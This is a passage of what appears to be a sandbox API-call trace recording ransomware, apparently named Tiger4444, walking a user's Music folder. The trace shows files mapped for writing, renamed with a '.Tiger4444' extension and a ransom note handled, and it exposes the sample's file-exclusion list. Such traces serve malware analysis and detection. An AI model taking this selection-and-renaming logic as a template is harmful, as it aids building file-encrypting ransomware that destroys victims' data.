lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\.BFC0E91B00AE8A0620D3" [0046.122] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.125] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.127] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.128] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.129] CloseHandle (hObject=0x2ac) returned 1 [0046.129] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy") returned 65 [0046.129] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.129] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd4c6a930, ftCreationTime.dwHighDateTime=0x1d4d3a9, ftLastAccessTime.dwLowDateTime=0xa9f88e0, ftLastAccessTime.dwHighDateTime=0x1d4c885, ftLastWriteTime.dwLowDateTime=0x80836f50, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0046.130] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.130] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.130] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.130] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.130] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd4c6a930, ftCreationTime.dwHighDateTime=0x1d4d3a9, ftLastAccessTime.dwLowDateTime=0xa9f88e0, ftLastAccessTime.dwHighDateTime=0x1d4c885, ftLastWriteTime.dwLowDateTime=0x80836f50, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.130] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.130] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.130] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.130] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.130] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.130] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x80836f50, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x80836f50, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80836f50, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.130] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.130] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.130] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b0d1e0, ftCreationTime.dwHighDateTime=0x1d4c9cd, ftLastAccessTime.dwLowDateTime=0x82c7abe0, ftLastAccessTime.dwHighDateTime=0x1d4cdb7, ftLastWriteTime.dwLowDateTime=0x82c7abe0, ftLastWriteTime.dwHighDateTime=0x1d4cdb7, nFileSizeHigh=0x0, nFileSizeLow=0x4bad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="geOqCbV8uwQiJY9.mp3", cAlternateFileName="GEOQCB~1.MP3")) returned 1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="Tiger4444.exe") returned -1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2=".") returned 1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="..") returned 1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="windows") returned -1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="bootmgr") returned 1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="pagefile.sys") returned -1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="boot") returned 1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="ids.txt") returned -1 [0046.130] lstrcmpiW (lpString1="geOqCbV8uwQiJY9.mp3", lpString2="NTUSER.DAT") returned -1 [0046.130] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="geOqCbV8uwQiJY9.mp3" | out: lpString1="geOqCbV8uwQiJY9.mp3") returned="geOqCbV8uwQiJY9.mp3" [0046.130] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\geOqCbV8uwQiJY9.mp3", dwFileAttributes=0x0) returned 1 [0046.130] lstrlenW (lpString="geOqCbV8uwQiJY9.mp3") returned 19 [0046.130] lstrlenW (lpString="Tiger4444") returned 9 [0046.130] lstrcmpiW (lpString1="QiJY9.mp3", lpString2="Tiger4444") returned -1 [0046.131] lstrlenW (lpString=".dll") returned 4 [0046.131] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0046.131] lstrlenW (lpString=".lnk") returned 4 [0046.131] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0046.131] lstrlenW (lpString=".ini") returned 4 [0046.131] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0046.131] lstrlenW (lpString=".sys") returned 4 [0046.131] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0046.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\geOqCbV8uwQiJY9.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\geoqcbv8uwqijy9.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.131] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.131] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13758399558) returned 1 [0046.131] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=19373) returned 1 [0046.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0046.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0046.131] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4eb0, lpName=0x0) returned 0x2c8 [0046.131] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4eb0) returned 0xbe0000 [0046.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0046.132] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0046.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.132] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0046.132] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.132] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0046.132] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13758538254) returned 1 [0046.132] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0046.132] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0046.132] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.133] CloseHandle (hObject=0x2c8) returned 1 [0046.133] CloseHandle (hObject=0x260) returned 1 [0046.134] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\geOqCbV8uwQiJY9.mp3.Tiger4444") returned 95 [0046.134] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\geOqCbV8uwQiJY9.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\geoqcbv8uwqijy9.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\geOqCbV8uwQiJY9.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\geoqcbv8uwqijy9.mp3.tiger4444"), dwFlags=0x1) returned 1 [0046.135] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=19376 | out: Addend=0xc6f980) returned 20324416 [0046.135] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4601 [0046.135] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe17372d0, ftCreationTime.dwHighDateTime=0x1d4ca49, ftLastAccessTime.dwLowDateTime=0x22687900, ftLastAccessTime.dwHighDateTime=0x1d4d4dd, ftLastWriteTime.dwLowDateTime=0x22687900, ftLastWriteTime.dwHighDateTime=0x1d4d4dd, nFileSizeHigh=0x0, nFileSizeLow=0xd874, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PKDoJjf.mp3", cAlternateFileName="")) returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="Tiger4444.exe") returned -1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2=".") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="..") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="windows") returned -1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="bootmgr") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="pagefile.sys") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="boot") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="ids.txt") returned 1 [0046.135] lstrcmpiW (lpString1="PKDoJjf.mp3", lpString2="NTUSER.DAT") returned 1 [0046.135] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="PKDoJjf.mp3" | out: lpString1="PKDoJjf.mp3") returned="PKDoJjf.mp3" [0046.135] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\PKDoJjf.mp3", dwFileAttributes=0x0) returned 1 [0046.135] lstrlenW (lpString="PKDoJjf.mp3") returned 11 [0046.135] lstrlenW (lpString="Tiger4444") returned 9 [0046.135] lstrcmpiW (lpString1="DoJjf.mp3", lpString2="Tiger4444") returned -1 [0046.136] lstrlenW (lpString=".dll") returned 4 [0046.136] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0046.136] lstrlenW (lpString=".lnk") returned 4 [0046.136] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0046.136] lstrlenW (lpString=".ini") returned 4 [0046.136] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0046.136] lstrlenW (lpString=".sys") returned 4 [0046.136] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0046.136] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\PKDoJjf.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\pkdojjf.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.136] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.136] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13758917167) returned 1 [0046.136] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=55412) returned 1 [0046.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0046.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0046.136] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdb80, lpName=0x0) returned 0x2c8 [0046.136] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdb80) returned 0xbe0000 [0046.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0046.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0046.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0046.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0046.138] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13759102508) returned 1 [0046.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0046.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0046.138] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.139] CloseHandle (hObject=0x2c8) returned 1 [0046.139] CloseHandle (hObject=0x260) returned 1 [0046.141] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\PKDoJjf.mp3.Tiger4444") returned 87 [0046.141] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\PKDoJjf.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\pkdojjf.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\PKDoJjf.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\pkdojjf.mp3.tiger4444"), dwFlags=0x1) returned 1 [0046.141] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=55424 | out: Addend=0xc6f980) returned 20343792 [0046.141] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4602 [0046.141] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dcb1540, ftCreationTime.dwHighDateTime=0x1d4d1a5, ftLastAccessTime.dwLowDateTime=0xe3003df0, ftLastAccessTime.dwHighDateTime=0x1d4cbb5, ftLastWriteTime.dwLowDateTime=0xe3003df0, ftLastWriteTime.dwHighDateTime=0x1d4cbb5, nFileSizeHigh=0x0, nFileSizeLow=0x9557, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vRwHl.m4a", cAlternateFileName="")) returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="Tiger4444.exe") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2=".") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="..") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="windows") returned -1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="bootmgr") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="pagefile.sys") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="boot") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="ids.txt") returned 1 [0046.141] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="NTUSER.DAT") returned 1 [0046.141] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="vRwHl.m4a" | out: lpString1="vRwHl.m4a") returned="vRwHl.m4a" [0046.141] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\vRwHl.m4a", dwFileAttributes=0x0) returned 1 [0046.142] lstrlenW (lpString="vRwHl.m4a") returned 9 [0046.142] lstrlenW (lpString="Tiger4444") returned 9 [0046.142] lstrcmpiW (lpString1="vRwHl.m4a", lpString2="Tiger4444") returned 1 [0046.142] lstrlenW (lpString=".dll") returned 4 [0046.142] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.142] lstrlenW (lpString=".lnk") returned 4 [0046.142] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.142] lstrlenW (lpString=".ini") returned 4 [0046.142] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.142] lstrlenW (lpString=".sys") returned 4 [0046.142] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.142] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\vRwHl.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\vrwhl.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.142] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.142] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13759517760) returned 1 [0046.142] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=38231) returned 1 [0046.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0046.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0046.142] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9860, lpName=0x0) returned 0x2c8 [0046.142] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9860) returned 0xbe0000 [0046.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0046.143] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0046.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.144] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0046.144] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.144] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0046.144] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13759680157) returned 1 [0046.144] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0046.144] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0046.144] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.144] CloseHandle (hObject=0x2c8) returned 1 [0046.144] CloseHandle (hObject=0x260) returned 1 [0046.146] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\vRwHl.m4a.Tiger4444") returned 85 [0046.146] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\vRwHl.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\vrwhl.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\vRwHl.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\vrwhl.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.146] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=38240 | out: Addend=0xc6f980) returned 20399216 [0046.146] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4603 [0046.147] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dcb1540, ftCreationTime.dwHighDateTime=0x1d4d1a5, ftLastAccessTime.dwLowDateTime=0xe3003df0, ftLastAccessTime.dwHighDateTime=0x1d4cbb5, ftLastWriteTime.dwLowDateTime=0xe3003df0, ftLastWriteTime.dwHighDateTime=0x1d4cbb5, nFileSizeHigh=0x0, nFileSizeLow=0x9557, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vRwHl.m4a", cAlternateFileName="")) returned 0 [0046.147] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0046.147] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.147] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\pkavamykozgt3xgcy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.147] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.147] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.148] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.148] CloseHandle (hObject=0x260) returned 1 [0046.148] CloseHandle (hObject=0x2ac) returned 1 [0046.149] GetCurrentThreadId () returned 0xfa8 [0046.149] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc663a8 [0046.149] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-" [0046.149] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0046.149] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0046.149] lstrcatW (in: lpString1="", 